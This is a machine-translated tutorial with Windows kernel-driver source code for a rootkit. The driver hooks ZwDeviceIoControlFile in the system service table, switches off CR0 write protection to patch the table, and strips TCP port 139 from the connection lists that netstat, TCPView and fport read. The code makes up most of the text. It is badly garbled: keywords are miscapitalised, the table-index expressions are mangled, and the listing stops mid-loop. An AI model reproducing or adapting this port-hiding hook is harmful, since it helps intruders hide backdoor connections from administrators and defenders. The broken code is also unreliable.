NetStat or other various types of ports, such as fport, or sysinternals TCPView, are called the API in iPhlPapi.dll to complete the list of ports. The API in iphlpapi.dll is ultimately using ZwdeviceIocontrolFile, sending IOCTL_TCP_QUERY_INFORMATION_EX to device object device / TCP to get various information. So we only need to hook the corresponding system service, then do some processing to get the result, and get off the port information that does not want to appear. However, the real problem is that IOCTL_TCP_QUERY_INFORMATION_EX and port-related structural definitions, the parameters meanings are currently (most) is not open, no one knows, that is, undocumented. Undocunted ?? Ring3 debugging, I am cooked. Ring0 debugging, I am cooked. Windows drivers, I am cooked. Windows system, I am cooked. I am afraid who I am. Undocumented ?? cool, is undocumented.
By debugging through RING3, analyzing how IPHLPAPI.dll uses IOCTL_TCP_QUERY_INFORMATION_EX related parameters, combined with some of the information in MSDN, so it is easy to understand the structure you need to understand. Use my own AWX to build a VC driver project, write the Hook section.
About the solution used in this example, how many places running under various Windows versions, there is a lot of places in many places, I don't know who I am thinking, I am in the source code of the book "undocument window Seeing this method for the first time.
Here is the source code, very simple, I don't say anything.
#if 0 / / =============================================== ===================
Copyright (c) JIURL, All Rights Reserved
============================================================================================================================================================================================================= ======================
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * /
Module Name:
JIURL_TCPIOCTL.H
About:
- This driver is created by an AppWizard I wrote. [Homepage]
http://jiurl.yeah.net
~~~~~~~~~~~~~~~~~~~~~
[Email]
Jiurl@mail.china.com
~~~~~~~~~~~~~~~~~~~~
[Forum]
http://jiurl.cosoft.org.cn/forum/index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Customization AppWizard, please contact it.
Comments:
All content in this document is currently undisclosed, and I analyze it, it is a key content hidden port.
Undocunted ?? Cool! It is undocumented.
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * /
#ENDIF
// jiuml // ipsnmpinfo structure definition is based on RFC 2011
// jiurl // So I define structural tcpsnmpinfo according to RFC 2022, imitate Ipsnmpinfo
// jiurl // Remove some definitions of some extensions through some analysis
Typedef struct tcpsnmpinfo {
Ulong TCPSI_RTOALGORITHM;
Ulong TCPSI_RTomin;
Ulong TCPSI_RTOMAX;
Ulong TCPSI_MaxConn;
Ulong TCPSI_ActiveOpens;
Ulong tcpsi_passiveopens;
Ulong TCPSI_ATTEMPTFAILS;
Ulong TCPSI_ESTABRESETS;
Ulong TCPSI_CurrestAb;
Ulong TCPSI_INSEGS;
Ulong TCPSI_OUTSEGS;
Ulong TCPSI_Retranssegs;
Ulong TCPSI_Unknown1;
Ulong TCPSI_Unknown2;
Ulong TCPSI_NUMCONN;
} Tcpsnmpinfo;
#define tcprtoalgorithm_other 1 // none of the folowing
#define tcprtoalgorithm_constant 2 // a constant RTO
#define tcprtoalgorithm_rsre 3 // Mil-STD-1778, Appendix B
#define tcprtoalgorithm_vanj 4 // Van Jacobson's Algorithm
#define TCP_MIB_STATS_ID 1
#define TCP_MIB_ADDRTABLE_ENTRY_ID 0X101
#DEFINE TCP_MIB_ADDRTABLE_ENTRY_EX_ID 0X102
Typedef struct tcpaddrentry {
Ulong Tae_ConnState;
Ulong Tae_Connlocaladdress;
Ulong Tae_ConnlocalPort;
Ulong Tae_ConnRemAddress;
Ulong Tae_ConnRemport;
} Tcpaddrentry;
#define tconnstate_closed 1
#define TcpConnState_Listen 2
#define tcpConnState_synsent 3
#define tcpConnState_synreceived 4
#define tcpConnState_ESTABLISHED 5
#define tcpConnState_finwait1 6
#define tconnstate_finwait2 7 # define tcpconnstate_closewait 8
#define TCPConnState_lastack 9
#define tcpconnstate_closing 10
#define tcpConnState_timeWait 11
#define tcpconnstate_deletetcb 12
Typedef struct tcpaddrexentry {
Ulong Tae_ConnState;
Ulong Tae_Connlocaladdress;
Ulong Tae_ConnlocalPort;
Ulong Tae_ConnRemAddress;
Ulong Tae_ConnRemport;
Ulong PID;
} Tcpaddrexentry;
#if 0 / / =============================================== ===================
Copyright (c) JIURL, All Rights Reserved
============================================================================================================================================================================================================= ======================
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * /
Module Name:
JIURLPORTHIDE.H
About:
- This driver is created by an AppWizard I wrote.
[Homepage]
http://jiurl.yeah.net
~~~~~~~~~~~~~~~~~~~~~
[Email]
Jiurl@mail.china.com
~~~~~~~~~~~~~~~~~~~~
[Forum]
http://jiurl.cosoft.org.cn/forum/index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Customization AppWizard, please contact it.
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * /
#ENDIF
#define porthide 139
#pragma pack (1)
Typedef struct service {
Unsigned Int * ServiceTableBase;
Unsigned int * service; // buy online in check builduiGned int numberofServices;
Unsigned char * paramtablebase;
} ServicesDescriptAblentry_t, * pserviceDescriptableentRY_T;
#pragma pack ()
__Declspec (DLLIMPORT) ServiceDescriptAblentry_t keserviceDescriptable;
NTSYSAPI
NTSTATUS
NTAPI
ZwdeviceIocontrolfile
In Handle FileHandle,
In Handle Event Optional,
IN PIO_APC_ROUTINE APCROUTINE OPTIONAL,
In Pvoid APCCONText Optional,
OUT PIO_STATUS_BLOCK IOSTATUSBLOCK,
In Ulong IoControlcode,
In Pvoid InputBuffer Optional,
In Ulong InputBufferLength,
Out Pvoid OutputBuffer Optional,
In Ulong OutputBufferlength
);
Typedef NTSTATUS (* ZwdeviceiocontrolFile)
In Handle FileHandle,
In Handle Event Optional,
IN PIO_APC_ROUTINE APCROUTINE OPTIONAL,
In Pvoid APCCONText Optional,
OUT PIO_STATUS_BLOCK IOSTATUSBLOCK,
In Ulong IoControlcode,
In Pvoid InputBuffer Optional,
In Ulong InputBufferLength,
Out Pvoid OutputBuffer Optional,
In Ulong OutputBufferlength
);
Zwdeviceiocontrolfile OldzwdeviceIocontrolfile;
Void Driverunload (in PDRIVER_Object DriverObject);
NTSTATUS
Driverdispatch (in PDevice_Object DeviceObject, In PIRP IRP);
NTSTATUS NewzwdeviceioControlFile
In Handle FileHandle,
In Handle Event Optional,
IN PIO_APC_ROUTINE APCROUTINE OPTIONAL,
In Pvoid APCCONText Optional,
OUT PIO_STATUS_BLOCK IOSTATUSBLOCK,
In Ulong IoControlcode,
In Pvoid InputBuffer Optional,
In Ulong InputBufferLength,
Out Pvoid OutputBuffer Optional,
In Ulong OutputBufferlength
);
// jiurl // from addrconv.cpp
#define ntohs (s) /
((((S) >> 8) & 0x00FF) | /
(((s) << 8) & 0xff00)))
// jiurl // from tcpioctl.h tdiinfo.h Tdistat.h
#define ioctl_tcp_query_information_ex 0x00120003 // * Structure of an entry ID.
Typedef struct tdientityId {
Ulong Tei_ENTITY;
Ulong tei_INSTANCE;
} TdientityID;
// * Structure of an Object ID.
Typedef struct tdiobjectid {
TDIENTITYID TOI_ENTITY;
Ulong toi_class;
Ulong toi_type;
Ulong TOI_ID;
} TDIOBJECTID;
#define context_size 16
//
// queryinformationEx ioctl. The return buffer is passed as the outputbuffer
// in The Deviceiocontrol Request. This Structure is Passed as The
// InputBuffer.
//
Struct TCP_REQUEST_QUERY_INFORMATION_EX {
TDIOBJECTID ID; // Object id to query.
Ulong_ptr context [context_size / sizeof (ulong_ptr)]; // multi-request context. Zeroed
// for the first request.
}
TYPEDEF STRUCT TCP_REQUEST_QUERY_INFORMATION_EX
TCP_REQUEST_QUERY_INFORMATION_EX,
* PTCP_Request_Query_information_ex;
#define CO_TL_ENTINTY 0X400
#define info_class_protocol 0x200
#define info_type_provider 0x100
#if 0 / / =============================================== ===================
Copyright (c) JIURL, All Rights Reserved
============================================================================================================================================================================================================= ======================
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * /
Module Name: jiumlporthide.cpp
About:
- This driver is created by an AppWizard I wrote.
[Homepage]
http://jiuml.nease.net/index.htm
~~~~~~~~~~~~~~~~~~~~~
[Email]
Jiurl@mail.china.com
~~~~~~~~~~~~~~~~~~~~
[Forum]
http://jiurl.cosoft.org.cn/forum/index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Customization AppWizard, please contact it.
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * /
#ENDIF
#ifdef __cplusplus
EXTERN "C"
{
#ENDIF
#include
#include "jiumlporthide.h"
#include "jiuml_tcpioctl.h"
#ifdef __cplusplus
}
#ENDIF
NTSTATUS
Driverence (in PDRIVER_Object DriverObject,
In Punicode_String RegistryPath)
{
DBGPRINT ("JIURLPORTHIDE: Hello, this is driving! / N");
DriverObject-> majorfunction [IRP_MJ_CREATE] =
DriverObject-> Majorfunction [IRP_MJ_CLOSE] = driverdispatch;
DriverObject-> driverunload = driverunload;
// Save Old System Call Locations
OldzwdeviceioControlFile = (Zwdeviceiocontrolfile) (KeserviceDescriptable.ServentableBase [* (pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((PUCHAR) ZWDEVICEIOCONTROLFILE 1)]);
_asm
{
CLI / / DISSABLE INTERRUPT
Mov Eax, Cr0 // Move CR0 Register INTO EAX
And Eax, NOT 10000H // Disable WP bit
MOV CR0, EAX / / WRITE Register Back
}
(KeserviceDescriptable.ServentAblebase [* (pulong) ((pulong) ((pulong) ((pulong) ((PUCHAR) ((PUCHAR) ZWDEVICEIOCONTROLFILE 1)]) = (ulong) NewzwdeviceiocontrolFile;
_asm
{
Mov Eax, Cr0 // Move CR0 Register INTO EAX
OR EAX, 1000H // Enable WP Bit
MOV CR0, EAX / / WRITE Register Back
STI // enable interrupt
}
Return status_success;
}
NTSTATUS
Driverdispatch
In PDEvice_Object DeviceObject,
In PIRP IRP
)
{
IRP-> iostatus.status = status_success;
IOCOMPLETEREQUEST (IRP, IO_NO_INCREMENT);
Return IRP-> iostatus.status;}
Void Driverunload (in PDRIVER_Object DriverObject)
{
DBGPRINT ("JIURLPORTHIDE: BYE, this is driverunload! / N");
_asm
{
CLI / / DISSABLE INTERRUPT
Mov Eax, Cr0 // Move CR0 Register INTO EAX
And Eax, NOT 10000H // Disable WP bit
MOV CR0, EAX / / WRITE Register Back
}
(KeserviceDescriptable.ServentAblebase [* (pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((PUCHAR) ZWDEVICEIOCONTROLFILE 1)]) = (ulong) Oldzwdeviceiocontrolfile;
_asm
{
Mov Eax, Cr0 // Move CR0 Register INTO EAX
OR EAX, 1000H // Enable WP Bit
MOV CR0, EAX / / WRITE Register Back
STI // enable interrupt
}
}
NTSTATUS NewzwdeviceioControlFile
In Handle FileHandle,
In Handle Event Optional,
IN PIO_APC_ROUTINE APCROUTINE OPTIONAL,
In Pvoid APCCONText Optional,
OUT PIO_STATUS_BLOCK IOSTATUSBLOCK,
In Ulong IoControlcode,
In Pvoid InputBuffer Optional,
In Ulong InputBufferLength,
Out Pvoid OutputBuffer Optional,
In Ulong OutputBufferlength
)
{
NTSTATUS RC;
Rc = ((zwdeviceiocontrolfile) (OldzwdeviceIocontrolfile) (
FileHandle,
Event,
Apcroutine,
APCCONText,
Iostatusblock,
IOCONTROLCODE,
InputBuffer,
InputBufferlength,
OutputBuffer,
OutputBufferlength
);
IF (IOCONTROLCODE! = IOCTL_TCP_QUERY_INFORMATION_EX)
{
Return (RC);
}
TCP_REQUEST_QUERY_INFORMATION_EX REQ;
TCPAddrentry * TcPTable;
TCPAddrexentry * tcpextable;
Ulong Numconn;
Long i;
DBGPRINT ("JIURLPORTHIDE: IOCTL_TCP_QUERY_INFORMATION_EX / N");
IF (NT_Success (RC))
{
Req.id.toi_entity.tei_entity = CO_TL_ENTITY;
REQ.ID.TOI_ENTITY.TEI_INSTANCE = 0;
REQ.ID.TOI_CLASS = INFO_CLASS_PROTOCOL;
REQ.ID.TOI_TYPE = INFO_TYPE_PROVIDER;
REQ.ID.TOI_ID = TCP_MIB_ADDRTABLE_ENTRY_ID;
IF (! Memcmp (InputBuffer, & Req, Sizeof (TDIObjectID)))
{
Numconn = iostatusblock-> information / sizeof (tcpaddrentry);
TcPtable = (tcpaddrentry *) OutputBuffer;
For (i = 0; i { IF (NTOHS (TCPTable .tae_connlocalport) == porthide) {DBGPRINT ("JIURLPORTHIDE: HIDEPORT% D / N", NTOHS (TCPTable.tae_ConnlocalPort); Memcpy ((TCPTable i), (TCPTable i 1), ((NumConn-i- 1) * sizeof (TCPAddrEntry))); numconn -; i -;}} IoStatusBlock-> Information = numconn * sizeof (TCPAddrEntry); return (rc);} req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_EX_ID; if (memcmp! (InputBuffer, & req, sizeof (TDIObjectID))) {numconn = IoStatusBlock-> Information / sizeof (TCPAddrExEntry); TcpExTable = (TCPAddrExEntry *) OutputBuffer; for (i = 0; i
